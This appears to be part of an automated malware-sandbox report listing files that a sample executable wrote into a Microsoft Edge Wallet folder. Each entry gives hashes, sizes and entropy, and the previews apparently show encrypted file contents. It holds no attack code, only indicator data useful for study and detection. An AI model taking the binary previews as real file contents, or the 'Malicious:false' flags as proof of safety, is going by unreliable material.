                                                                                                                                                  SHA-512:96E63D8AFDC998637446D11E3BE920B7DB0713EFFE3D84158812E0153CA9114E13DE43FB7C92E1EEE15175285A9064E780580934EDE1183410A7B6C2177CF305
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:/*.ob.....I*...+.6....?.... F..+........5W.:l.....Vn.nCn..FJ.5E.Y.....p.v.j.KmY...m..E=.>..P.Rm..X..6....+....1B.3...Q.......U........@.C&.U....t.].A.}.c.....QX.5s...Fl$.F...n....A..E.IP.......9.N.;..Z.K.....UO....U.`2.xiM?Q#..S....8.n...0\.RC=...). BO./.*9T|+.J..f..>.4.'M...l....M.qX.T].Xn...d.rc.nL.=J...o..2..oO.8..d.9L..b..c...&x.41..~r.b#R8D.$|..H......rfgm.}...k. .m.[H..0p.....H...gQb1.FG...;......:..}.w..X..~..|b-..cx.E.B.O.Th.......=..-.4".."0._..."......<SM.Y.0W.R}..{.J.T...NC.........S.'...B.{}.n,.BN.5.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.html

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1890
                                                                                                                                                  Entropy (8bit):7.899243021622354
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:KGBPao1Y5I7RKTEQvqABQjAnkvziXXPeQCG3jLsNHXX3CD:KG1F1Y5IETEzGQskvzijTLsdK
                                                                                                                                                  MD5:8D87B0B10836179E12DAC3BAE070DA7F
                                                                                                                                                  SHA1:6BA097159C8FB653DC3C5713CC824AABFC7D1922
                                                                                                                                                  SHA-256:F10037BE2F2AD865043C4327B0C97D4FE68D6E8C8CE8674F328929FED2F83EF3
                                                                                                                                                  SHA-512:90418FBB8801E0E652A9554106347F3B39B8BBA501779D7A6D49CFC55F9688D8ED43146CBEE8692C5D996F5EF687759CF8A3BA6E208E57F1ABDCA52A78E79963
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<!doc'.......Y..i...y>.aG{>.].q.L.m..{..3...lj.......jtRa`J<.....L.h.!..X`..,..3.. .E.T.=%.T....'.F..EV....F..TJ2.....K.!.v.....|......@....4........V..>9...\1Dn..Nt..;..cF..=..3...T.66.u.'.....6..4n.g.l...3..C..y.Dv....j.k.b.W3..<..LF....b".".aw~..2o...5.y...a..=%.n8.^.H.]%......|W..>..b.. ./.dY..m{K.x...|.>..".I;..=-.9`.?.Z...0.....C.5..M..9."..p.4/H..7...L4...M.E...Q......H..5...J..[M..,.n..V=..N=8..K...G<u.p..f....q..4LKFA4/...y.=..D.R..z.1...-..l..i.|?..J...i.C?b>-)....=C.{W...^&-<|-M..1..;.#.._bc[.....R&..P...)2.w........63q................|.yN%NQ.-...................0...o....rH..|..].K#..`...~a..eS0..=..~"..t...:g..n.-..q..>....W...y......:.G..-9$..w./{......jj..p....N.......Z7...l.Yh^...!.?g..N.XQ.......-........n.]dVo.!d;......)z..u.x@..Q.....'....U=aUs......6.0,. 7....R.pS.....=..../.......fm.%..c.p-.cN2....mU@.".n*i5.b....#..m$.~.G....lB.........<....I...z1FXs..vaU......1..H...s%..ZL.z....@..........]U?.T......w.i.?

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):552583
                                                                                                                                                  Entropy (8bit):6.7838583235452425
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:jhjAn8lzu+f3I7vx7N+skLnBYFQPMjh5OkJSe3J9OkJT+jucyBfQHe3JbwrQKZ24:jhjAQueI7vx7N+skLnBYFQPMjh5OkJS5
                                                                                                                                                  MD5:9B773D3F5EE4F93216B184BC870C55AB
                                                                                                                                                  SHA1:2E6E0FD4CD4D6DAF4D1A00A478065DB4E22EA3D3
                                                                                                                                                  SHA-256:307DEF341D91F29E29040542963CAAB6E3F37D6DE4FC908CCA22C1C4176D4BE7
                                                                                                                                                  SHA-512:5076AF9C1DF8671C50710C167DF24DB2EDD05CA6DE1943C1A664C3677A326F6A70C2B0F40B8827472269130D8166745297AB8B7EE27B2C9AAF8FFE91A8218574
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:/*! F.xE7EI...o%.4...<tV..z...._i@..s....A8I.6.;.a..-....7.M..i4_1[..[&.....(....".7z...).'..em.....,...0.J.h,._V.1..F].G...'&.....T-agJ..y<U.,.....w.}..S'.$....mIt.2....._H.s.<=@:[\8 ...._....(X`.Mu.........\.......i....S0.=.tuK;.9D.-.......I..t.?j...ld....].h....9=..4C.<.K.p......|b=..../...k.....m....%...CW.N..e!&'*F.d\q....v..N..^.@...4.Y....#H...MT.>.W...3...B.t.;..A.......93.."...../E.1@e........7.f......7MBB.@..)P....pL.....J...ft!..|4.x...@..z.A.u.Z..;$.+.'.....N....i...:.g..4n.2V.u6..s......nE..C..^..G.^(o.(.?...e...8U..J..}...q".J=qV.]e...owJsN..u..~L....0#hS..g..Xe5......V..'b..V>....J.<v.c&Y.hPp..B.7.#....K.)...,WyV.....I5..n..iG.;...X..`.%....C.....e....O*...J..u..}.%..+.......Q..V....=.kr....yd_...J|....x..F..E..H$..%wk...p....$.5... A....*...J..@'....p..94{b...)...6.:K7U.).?....[.c.J..RmY.#....]S..yr.k..H.?.3$v.....I``.....&M.J.xN#.?..[/v....Y...d..9OT.3...V.]D.p...m....>..'...'ff...cx0G..rL..\].....=5...6<'

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.LICENSE.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1651
                                                                                                                                                  Entropy (8bit):7.888026184483322
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Qeup9s3lseB2optGCLTUnoN4+Q1YOtx5S4UsH4zM+YSmP/H10DrD:QeunsKehXkoNI1Y6XYzXYpqDH
                                                                                                                                                  MD5:69DF0BF36DD07B73F44D846CFC0F1192
                                                                                                                                                  SHA1:0506161C6F42D140C41400D6EAFF63C59487A0BE
                                                                                                                                                  SHA-256:59B30A44F32E7AFE83C3F84568A363339B39774171F32A9C9B0F6358E218315F
                                                                                                                                                  SHA-512:39B1EE093DB144F68D677E66798361AE91A0E9C775BC61A1D18B3557CDFD20448D7F55C51277CC795EA2AA471DFCE94245E77DCBBECEEF78FDCD9A0DA553F3C0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:/*.obt.8...R......'.'{........#.U.......j.VJ...5..H.(K.....;m..#;....,.o...&.,ZX$..& {._..K.#.. .M..cM...%...0U.@.....{K..Ii....r.]i...,b.S|cI.@..+......i.f......".2...-3..%..03P.}_3.H|.0...T....w.f..G.5.../nP...ta..-...C....od....OW)..HZ+../...{..#....C...9p@4:.....2^..8.+.}0..".....n.5.bM6...e.t.Gj.vc8..J.pM...`.9.....n.AP..C....DS./.B#.NHz....-.'.R..7.Gt.m3.nW..-...+:.]%..$....Q....Qe..U. ......5...?^...oB.s..)6&.H-.^H...uz.T......+.0.Y...=&@Jt7.H.9[... B.....j.Oy.$.DX.n..w...........W?c.t.o.<.......d.m=.........1..1..#VnK1!.L?..Q.X....8...?.0....$p...%....Y.c..;.......%.o<,Is..3..X..jz.|.h...........`.5..e.k84Y.E.e..0yt...n@.rGr:a.1.X...'..._.c..k. J...q......avW.h..C...4..p.=.....?yk$,<.P.R...gsD!.O<)bs.._..v.L.6'>_......FA.X.....*..%........`.L..7".iPP:....$.P.7.|..>1.....p....o....R...=.A.nj....A.6.0..m.....7...Q..i.j]t..../%.G..5...9..^..1.Y..J....=46.IP"....Y....p......1.Rb{..ab.+b.r.e...;...\...O....fC..~`....h....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.html

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1747
                                                                                                                                                  Entropy (8bit):7.899362361027285
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:GtdOT9V+W1iWX9x/7CNknXvsIH0wH3V+O8eoOXxmKD:Gt4V+nWNx/2NkXvWZOQOXxmC
                                                                                                                                                  MD5:93739EF9F0583D70892BD95D5396A536
                                                                                                                                                  SHA1:C10305CABB77BA210203705E8D3F6C8293930059
                                                                                                                                                  SHA-256:A3C544757530B3D6F261E356B36E9CB72BB77E10488058D5A487DED31019C513
                                                                                                                                                  SHA-512:A16A46142E89ACD12BC1BAC0CE94823A8CF21FD8D2C88AFCFCC1AE9D351D47FC5F52A979C63A7B02E2275A8267FE642EF9035F42D26A74CE37E8A347A5C7AECE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<!doc4.M..:.....4.......U&......../#........W.~....$..>.nr`..S....~.H.3F%E_..%..g|.w..4..H..7...9.z....!.m.vr....r.7N~-....^...A_.....-M>.....V..6..+.........%3..8|z]..3.R7........r..(.;Z............C...[.x.a..g.9.2F....B...A<.\.T.:mqQ..{.5.....i.....@AY...\.D..b.5.d..F....s......>....;c...U..C.Wm.Zh.fs.....Oy.U..K9....ZMT.......\.n..W0.......D...9J[.3g.z.H`p........2.F.>Cp...L.C.m..r.O..B8p.DT..9A.(..`A...Tq.}..am.....W..T...[i.."..YKJ/.4[.T._.?......E:.9!..LiK.f..Qf..H:[._...MB.;.Df.33o.(....1.V.c4.....[.N.<..=.]7..Dca=.](?T..........n.8........j...x..g..........HX....px-./D.h.t.4......5.r.I...O.w..U.^5.2...bJ,.K...Ty.P...l .2..5.7^..Ac.../.q#.z.=..L4......F./..5....T.:Lcn..@..t.>.mj.>...`.j.m<....~..e..R...."Sp.N.ZOG.?..O.C...J.-..;.j.}|k62...p....Dt2T....J..9...m.$;...!+...\#..P...*..1..p.6...w.I.(....*8...V..5.\..;.fq....z(.V....K.o....z.-...%=..`_.<LI..i*=Q...4..@..K.Fj9.an.L.&..X.._.....{....W.w.*...T.j..BM P<C...G...?o...xZ

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\app-setup.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):371
                                                                                                                                                  Entropy (8bit):7.339923499294056
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:xpRSLmcqcwI4K60a6lEn9E4hU/mXmdTYzkLPXmY6wqlnIS1WdNcii96Z:3RSLmc5b6b6oKZ/rTUkLugSUdNcii9a
                                                                                                                                                  MD5:9DBC9E56B8BAE0677652821AE843A6DB
                                                                                                                                                  SHA1:A7338D04EED00BB758B29D85C8E8B2909A00EA2D
                                                                                                                                                  SHA-256:816E866BCFB453E92EAB8AC9D8C500ED0A4AA0AFF1FD961B1E5D201F48E6CF39
                                                                                                                                                  SHA-512:A211B9086F936B2044F4059ADD24BA4B6EA530C481F0C1E8CAFAB20D7367C15C89B51CB6C636F2A96EDB21C558821B0D1724F21E6FFCE9307DD63F0275DE11EE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:windo.......K..`.E1.....P.X-......."%.y...[....1U/.-2..i...1.,..}h).<S.].?"xX...[......H....A...#..\...9a.<..O..............T.Z.!.g.Gk.{.........Xi...t..{7.H.....BPf..Ay..t....]wD{8y.........Z.>.....q....m....g...SC.}.....u.L.3....J...iW.%.T..@...[6..u.l1c.s.m@.).^y[...\.+...x.EmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\load-ec-i18n.bundle.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16498
                                                                                                                                                  Entropy (8bit):7.9880965804266575
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:5Gz7zl5PosKn7UK9glff+Ijpdnb/sIwaLizc:5GZ59Knv2/dnb/3izc
                                                                                                                                                  MD5:9117B4B6528C0F6E08A6772725E1177A
                                                                                                                                                  SHA1:0BA12E88364B2D0226338D8D4794261BF54AA4E9
                                                                                                                                                  SHA-256:851326147D48C534993C966E7F1A4C1D5AF28301A231260C9030DC5A4E392C62
                                                                                                                                                  SHA-512:F050E320E17B15A5C5CD6C285D75B2E7CE04659C995595EDCFFDF21917DD946E2A6095ECD3D86D042EE9CD658C7DE545BFA4829435E74215FA99BE25D21E9CDB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:(()=>*}...L....v8...w\.g.O.....*...T#.L..L..z+i.P._1....Z..>.1i].=..Bb......k...`.|....DE0EqT.v....g+.../.H&q.l0..fl\.l.{..\k'(..y/..&.-...Z...s..^(...(;.A...%...8.d".>.j....+.a..h.....C$.hSK....s.. a..55..O3P.#....y/..$o...L$n.4...Pc..,.'..'X.I'}.......ZX.....Qzx..G.[.....?g........4.R..2H.*.'8..7...~.1.....F3H...T<?.YG.>.fS.4..G.r62dJ.....H-.....M.o+ ..%g..'....9.....Fq...l..H..?7..w..Ke.......i.X.<.I.C..>....t/,w....H...q.2.co."/J..}.j...P...91....O.=..^@....Tc......./...^4G%./.*E3<.....g#........_.../.9..-...`.|...)...0e..v.l..v......?.,...".S..G.n.H.r.T.Sn.$..H....(.....1....~...n.W^.....C..&.,.^m..J...-.W.wKH.....'.:..^........G...>P5..X..b..e.G........0..Ug..[...!.4G.........OG.^h...5.4g.Y..P.....2..2..gA...Ut"..$T3.Ow9..lt.........8V..%..9....X...5...-...PG.1......b..Al3..........}f....$...s.......q8.Z.A.i.<.y.DF..xR..:T.j......Nr.y.....I...c....[..P..5......rO^Q.FhF>...|....W.....v%.Dn".D..A...>..op.(..f..Q.?.!....=......../

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1394997
                                                                                                                                                  Entropy (8bit):6.145822210112898
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:SvvL2Fx2Mr+Y2mHDvpttZwJbhTJrSK4VPYOI+AmOkmMOkxhdlrw+QsjZIQi6SiYn:cz2Fx2MrPbDvpttZwJbhTJrSK4VPYOIT
                                                                                                                                                  MD5:35A6BD4FAD4BD130162EC39D449BD5E0
                                                                                                                                                  SHA1:E1144A37B8D4AE77F05920CA893F99F81C3D2912
                                                                                                                                                  SHA-256:9FAFFB3C5F9273D71E368A5C73FF5318EA8CEC1CCC0953A2D9857B521746AD2B
                                                                                                                                                  SHA-512:BC01773BF80D052548E042D1CDA07B29FE7ED61D614D68954CBEF015B237515ACF3004906AA20871E79AB7A168A2C32C299F039A3A65DC6A23E1A9E55004416F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:/*! F^F....'P.s..)(..E.t.{z......ur.X#...0G....@.....+g.....x...c3l..>...b.-*.0.?ZD`.>.aR;.....$.....6.'F5.DG.wW.4`#....kB.a.'..oH.&.N. %M.g...P<.%.(.:/.......&....nW....)Uk...l..q..^o._./..K...TT....$.G..W.a.Fq..1..=...1.......`.b^.-.....I.r.2.k*p+.z.*......k...W..>.S...*..........e..p.....BB.?..l..%....p.5{......L.".....k.P..."G..k... {...A. G.o...Z...OTF..C.6%k..KZ....X.B......... ..B...L..s..C.Ex...&..F..\z....I0..U...I...^q..Y..3.l....8[.MG........5.Y..9-..%X+0C.q.....?.3T.>...w.....x.......i....."..}..5.......bo...8.v..b6=?.-(. .....!.`le..[.Q....L%.Z.:*..8.+5....F2.....p1..>.1wv..*.L......`...C&.........i...<{....H.{..y.............l..O...wkg@Cv....Y..10...2..E.39w[... I=,.r..G'....JV....]....2...P.?...'E....).WS#.G..M..N..w(x...@...<.j..?...r..e8..L...i.....~..m.=o......2s1f....4 .I........2.....t....B2+@7W^.v.Vdp....5!ZX3...i..=.`./b..\x...>...Q......P..N...K..._..w.........tt..G.e.;...XR`e...,.6....*......,.1n.kvy..?.?...f~..l..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.LICENSE.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2128
                                                                                                                                                  Entropy (8bit):7.909819779066294
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:SSX+uuBLEy/l38dEGTpIUlZXfPXih047nz98H1LeD:CBwQl1NUlZvfn4Dz984
                                                                                                                                                  MD5:084504BD184C5F1E06DE2AF7002ABDE1
                                                                                                                                                  SHA1:669EDFA19FB8725498797FF0E95F6AB7385B4BA3
                                                                                                                                                  SHA-256:D0CAED23D970F214CFED3E1F97B5A411D15089233E8BD3967307B06033E3CDF8
                                                                                                                                                  SHA-512:F52C0D6B740402194DB5150C2375D5D2E840DF843727EBB8C54190311B60EBD17B93122C7A0D5B5F61B9DDC4F8368FFE0B1CBEACF186C2CAD17DB19AF79EB893
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:/*.ob..='h....... C.i.,|N.KN....X1-.{.Rg&..9....I..{...1XyP.X.0...M.... .....(j..s[.&g./..KY.....~..s....T.Z./......bl.U.3#..q.O(=.O.P..yVf&...(.....x/2dG..b+.......V0"V..:F.A.....?...M.We.... .r<.O..C9...J?2X.7?kV.8..{..~..qqS../H.f..+..~....x...m#"...7.ym1=.e.D....r..5.<..s...~..<R&J..?...?X...;...].3..aMc.h2?..).h!.@@.u.......7...pL.$f..v...:N#F.......*i...x.G.E....u."d.q....Uk....U.nU'.l4e...k...(.....E..q.2..w...t.qX..G...).....\.......@.~....."O.n.{...W....C.h.tt_<..(..+=t.......7....#..)2{Q....Zn.;.36j.....P...@..K.6'H.....S...`Dt.jNc.ph<oLJ.1. ].,J.5.'G.....(.!T[.....Jk..M...2..fiK.....c.v.P...5.I1f .O...qP.Y.....[..u.v.......y.^\.......q....^/..f.B2he.!....o..H|.k.>o.K. ..I...F.8....l'...|A.B.......Q...RQo.......{...../]L...T>p...#9..So....[.)T.l...t*.....!.N..P_2....?..0......F.dvTyT...d.\........\\w<Y.t1.=@.T.?.9..&b..........r.. C..D..)..x...1.....L..FT._*1T.{..3.j..ZP..+..N....`.....W.....?.cs......:.L.7.._..*..[.4

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.html

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2212
                                                                                                                                                  Entropy (8bit):7.914420657447373
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:mJt7a8VEMuu1D9KhzRXR9NGQpJ3vxXLYi30DpjB6Gn2HZr5oNq+t6D:mK8WMuu99KhNXReeJ3tQJB18ZrSNqsS
                                                                                                                                                  MD5:7E225FB0CB59E2A0C8DEF558D7190AF3
                                                                                                                                                  SHA1:2F9FEB45BBDBCE1E5B1390EDD63DF9B87D24FE1D
                                                                                                                                                  SHA-256:86B83A7D17439A09F11090823FE160808986019FC883657B05CA61AE12EF822C
                                                                                                                                                  SHA-512:9F6272C9591F2F0A5075E36BC6139ADB8C80F766C0AA5A2F86D0739861229F5784D2E2F28B33B6C176226FB93A75F595EC72075BBD36FC550AC3FA2413B8740B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<!docq=K7.U....._....&...3`.VM...O d....t.iN..R....{.....4..5%...<..>.Q.GQq...S.Qh....'.c>.....k.....3.B.v@...M|~..M5...O....{N......?.X..v..N...Z.*].q....U/A.v.VpN...%....T...U....7.P.......;xi.2. ....../...`...8?...A..I..E.X........P.....6.r.\....A#.75e..aZ....'..g..I.C.zd].>[2.*#}.K..x/.8..Y'0...-.M..mtf..O.y...&p_.mX.!.A...Z.{'..P~...n.k.....aQ.Iu' .S{.@.&.!.R.AZ^...LEW...U.Mz...I..<....R.Z'...mnl._..Y....0:.Z.b..#.6.`..>...E1.n....7.0Mncq.j`|...........m?.3'...X...pV.5u...*.<.LYy..g!....m.y...&..!.i..\HI...>.4..0.;.a..<.4SDCy.kC.e.X...kYM.|........ e....)I......e..=,`.T@.8.......2..UnL.4.gE..r@..|.......-.%...p...~m.Gl6T...Q$....!0.}}...w$.._R..qf.O.B.@.9&1u...v...X...R..W.....=.......J:ak...\...:....8.....u...S;V.C.."C..`... .DN./E..K......e.B.ZZ.m..dLd.....w..c...$....U........i./r.+..h.M9......B6..i.....XuM,.\.H...Y.9[}...a.6..m..R..9...2...$>...R.$...&J91..M.3...~.)=.....:.a."0".|$...`"5..Id.....|.vQ.0s.d\...s.?...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):843227
                                                                                                                                                  Entropy (8bit):6.391474171008107
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Fng8Sy+VlmTu/xTC7XVq9zYFQxMjh52kJSe3JEkJT2jucyjfQHe3JD:Fng8SyCH/xTiXs9zYFQxMjh52kJSe3J9
                                                                                                                                                  MD5:AEFBAF47DCB0005362F6EDD89276E1BD
                                                                                                                                                  SHA1:02E36997945426228DCD054A99E1957F0E225AD0
                                                                                                                                                  SHA-256:C27E51AB98DC23BABD0B9B09312C19336FC0C31F72BF9CEFB7507C7F535CF754
                                                                                                                                                  SHA-512:A8B8E98ACCA9C113E1D873A70BFEFEE2DEBFE5513584F910EC431559FD14DD65E6703A832441153569F9894DE482C3F9BD656B8A56EFB30F6B7A13B8162A0A0F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:/*! F....D[&.[....H.U8.;...q.j.de .......)A].oM...R.....'.za._v..a...e.tU5K....V.M_...x...}.2.F.p.:...[.@.N..1.B..........D@...R....+......8f...;..$...Fr..k.....#....D..~......,]...H...gJ.u....../....S....Mi.{Z..O8L.G..#pX~.a.}....s.....h..W'.......y......[..f...=..._..}.`.....k.......g.........zt.p.F......P.T.......i......{..A.R...u....x[R.go..lK...-3..j.0.."..Z...9^....]1......`W.........ZJ..|C_...].i......-..'^X....N.3.y.. oz...~.E.2v..U.[F...r.:+}...7....D...M..}..P..G...A..*N;q....fJ.u...FKE.....'V..na.%.GF.`.....]<96........VA...2..:w3`..... .F..L............~"..@.H..y~.^0..zK.`W...._`5q.F.L.uG..1..D+.?7........,g.J...A.s...|c..l...v).!?n...cd......Y.R<#.q.<..I.9..W...=.S/.q....C..k)T....|....H.TV.7..;......._|}.).o5../.0r.....cu'!..X......\..g.6v..b\...Y..J.....k..GO)g..o.4..F..Q..|.-..X~*&x1F.T.j7)..G^.k....N.1v.....7.O.k..".|..{......%.v....7u<.H....o......Fw.].....?k.T.6|c....U....d.8..U..u......KA).....f.~\....~&5..w<:.,&

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.LICENSE.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2088
                                                                                                                                                  Entropy (8bit):7.9110689430467716
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:tj6rLzKUi5GSe1EgQUD41PpbUzc+JG8lMg+ImQwXWSSV+SD:5imUi5GShlU0x2VJRlMmZTI6
                                                                                                                                                  MD5:16151A6F0ED8B980CD2D8CCED705BE82
                                                                                                                                                  SHA1:A83D75EEB76D848AE0CA47F0DBB64A081A60C78A
                                                                                                                                                  SHA-256:77DC71CE82AB1A06C5E6B80A2303C792ACD16E3D2257DF19BAE982158BF46B91
                                                                                                                                                  SHA-512:0DAAFB775219E55984D46DD99F581520B937C3EE7C8068B9D3192B29526C4026B37FBC4B14541BECA882B44BF3D936079818C98949FD733592579A3063313D70
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:/*.ob...6;r..H.3...#..^. .z.K.F:...{u.....J.O..<...........KT6....J........>...~ ..hp\`.H..e.......hh.DR.M.}S..x...}...s+...<....l.L.9.N.`..c;^?P..}....9.....n..r...UE.&..-...^..KGd..z.../.Aaq...'J...q...f2.D.`.5........x;~oE.;..@t#.Vb.1...4$..K.>.P../.TGMv.j.0..I......e....DF/.d.&6....P.K...D)Z...........|=.;.%.k.}:XI.........mq......E.kz.h...1.q...{.O_V.S...Di.B...P...i.....g.$.$eT.z.A...B/N.....L`...5....uP%Y.....3i."w.+...Hr.g+..|...}..:.mL....F2`or^4. ..~S.T..j.+.7-.').T........q.Q..P.....$>t-...S0 ..E.....^....yA..._.f...m..1...+.x.b...Z.S.sP...1.i9...d$.0@....)...;MT.l..J..Kti.......D..!K.n.e5..h..t......y..sN..X..j....k..m.....ueV....F..3..i..+..^.......J...<2.b.\,.z......2/-.U..Q.7."..).\.>Z!n.a...*:..7.....Or.P.{.FZ...{.o............#_Y~.O.7..(.$ .t..t5_..pn..v...AL&.:....#[..H..d.!.". SD.....Ho...F..J@.T..o......X6..q...Q..o8..I....!#FA^.|.5L!>...a...zU..k`..@x.. .j...a..C.m..=6I.g}.~.l.4.Z.....2..^.I...K....%..I.%UC.........=...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.html

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1730
                                                                                                                                                  Entropy (8bit):7.890545260828014
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:PduiAU5DV+dedwop4ve9bbKP7URUpRR48BH4ioJbD:VVAUx0edp429bW9s8p2X
                                                                                                                                                  MD5:C31792BFE8620308BA5B91515769D092
                                                                                                                                                  SHA1:672B860456EF2A6EB213A4AB7DDB3B9C85708DEF
                                                                                                                                                  SHA-256:6B94DED33C870DE20096AEAD8E2D297EBAE0365AC69C75FAD156E040EC6C3BE0
                                                                                                                                                  SHA-512:0C3E8586FAEE1E00C9B30AA26539E116F1E04024227759C8E4E98A99E2E0ABC0B7A5A6325D628DD278A018ABFC388294C6DEE47910D2B3F6C8A3A3FD11D9006A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<!doc}`.....%i6.../...Q3.`.d.B...Uz.7h....+._JT'w.R../8.U:.:....)S.d9Z..XT.Z.=.5t.=...^GQA.jt2..n.Q.z.s..0`ln..w9..z..}...,.$.uS].w.U..LS...P..gM....Z.2.. .Dr.o:Q..C..."......c.:......C.5...eZV........OX........GRZ5......$\...uEF c.F...J.?..!.......*@ |.}.[?.6/&......g.\.<.FJO..D...Cp....3p.*.vv.*,R..t.D...2s.YW...u..]....c..&.].MZ..#=... ...d.b<.}....'.g.).R.#..../...Z.....?.4........S....+h....;....+..5u...{*.{...9.m.\...yt...4.gVd~.u>vx(8.....]. .L...*.k<....m...5.i..K.]+.....#..#.......Y.A..76...`s,..N....X.2.ao7.........[..c.Z.SU.p+.l..(....t...Y..Q.`.....L..DL..Sd....$U.9....,.I......."C.?...\.Z...z}..g.R.3@].n.cs...+F].tl.E.:J......G!y..{a.3....Nq8.=.P...'.$..y.....@...42...*d1.K.......:./ U.D..6.<....#d*.^.@..ma.R.E.......2.D.(...O.......}.1>l.o../1....U.#.4...M.....bb.....3&.n{.....[|3.....2... .$....TU..A|.qR......"'.,......m........z.=..L'5aQD.4.?..$.n.9P..a.QU..:1...C.a...R.....^...b.7)+...a....bJ....V..?......P..$..3w.].

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\README.md

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
